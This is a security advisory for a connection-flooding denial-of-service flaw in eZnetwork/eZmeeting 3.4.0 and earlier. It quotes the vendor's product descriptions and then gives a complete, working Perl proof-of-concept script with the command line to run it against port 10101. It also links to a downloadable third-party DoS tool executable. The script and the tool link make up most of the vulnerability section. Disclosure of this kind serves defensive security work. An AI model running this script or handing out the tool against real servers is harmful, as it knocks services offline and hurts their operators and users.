Security Advisory Vulnerability: Eznetwork multiple connections Denial of service Packages : "eZ34.exe" and "eZphoto1.2.1.EXE" + eZ + eZphotoshare + eZmeeting + eZnetwork + eZshare Software : www.eZmeeting.com [version 3.4.0] eZnet Modules: SwServer: 1.153 SwEzModule.dll: 1.72 SwLoginModule.dll: 1.94 SwMetaObjectModule.dll: 1.46 SwProxyModule.dll: 1.35 SwShareModule.dll: 1.90 SwStatusModule.dll: 1.41 SwTransferModule.dll: 1.172 Version : 3.4.0 and prior Vendor : eZnetwork Vendor Url : http://www.ezmeeting.com/Products.html Bug Type : Denial of service attack Severity : Medium--->remote crash Severity : medium Author: dr_insane , dr_insane@pathfinder.gr ################################################# ################################################# 1. Description eZ: --- "Imagine going to the movies, but instead of seeing the picture, someone had to describe it to you verbally. That's what's happening in countless business discussions and conference calls every day. A lot of time and money is being wasted. That's why we created eZ. Now imagine having the ability to place any document right in front of the person you’re speaking with on the phone, immediately - Word, Excel, PowerPoint, PDF, CAD, Digital Photos. Online. Real time. That's the power of eZ. Regardless of the distance that separates your team, eZ delivers an amazingly interactive, simple, visual workspace for all team players. If a picture paints a thousand words, think what an interactive picture can do for your business. Picture it with eZ." - Vendor's Description eZnetwork: ---------- "eZnetwork is a service that works hand in hand with the eZ desktop application. It allows users to connect with others (outside their Local Area Network) over the Internet, by using an eZ identity, or 'Friendly Name'. eZnetwork also allows users to host conferences and join conferences, even when one or more participants are located behind corporate firewalls, without compromising security." - Vendor's Description eZphotoshare: ------------- "eZphotoshare is an amazing new way to share Digital Photos over the Internet with friends and family. Seeing is believing, download it today and interactively share digital photos anytime, anywhere. It's FREE for home use." - Vendor's Description 2. Vulnerability Details The vulnerability is caused due to an error in the connection handling, which can be exploited to crash the server by establishing about 600 connections to 10101 port. By executing the following code against Ez.exe (port 10101) the server will crash: ----------------------------------------------------------------- "C:\Perl\bin\perl5.6.1.exe "C:\kill_ez.pl" 127.0.0.1 10101 600" | ----------------------------------------------------------------- #!/usr/bin/perl use Strict; use Socket; use IO::Socket; my $host = $ARGV[0]; my $port = $ARGV[1]; my $stop = $ARGV[2]; my $size = 1000; my $prot = getprotobyname('tcp'); my $slep = $ARGV[3]; printf("================================================\n"); printf(" Eznetwork POC \n"); printf("================================================\n"); printf("[*] Making %d Connections To %s \n", $stop , $host); for ($i=1; $i<$stop; $i++) { socket($i, PF_INET, SOCK_STREAM, $prot ); my $dest = sockaddr_in ($port, inet_aton($host)); connect($i, $dest); } CheckServer($host, $i, $slep, $stop); KillThreads($stop); printf("[*] Exploit Attempt Unsuccesful"); exit; sub CheckServer($host, $i, $slep, $stop) { ($host, $i, $slep, $stop) = @_; $blank = "\015\012" x 2; $request = "GET / HTTP/1.0".$blank; $remote = IO::Socket::INET->new( Proto => "tcp", PeerAddr => $host, PeerPort => $port, Timeout => '10000', Type => SOCK_STREAM, ); print $remote $request; unless ( <$remote> ) { printf("[*] Host %s Has Been Successfully DoS'ed\n", $host); printf("[*] The Host Will Be Down For %d Seconds\n", $slep); sleep($slep); KillThreads($stop); exit; } } sub KillThreads($stop) { $stop = @_; printf("[*] Killing All active Connections"); for ($l=1; $l<$stop; $l++) { shutdown($l,2)|| die("Couldn't Shut Down Socket"); $l++; } } If you don't want to use this code you can download g0dzilla to test it: http://members.lycos.co.uk/r34ct/main/godzillaDosTool/upgrade_to_v02.exe Workaround: User another product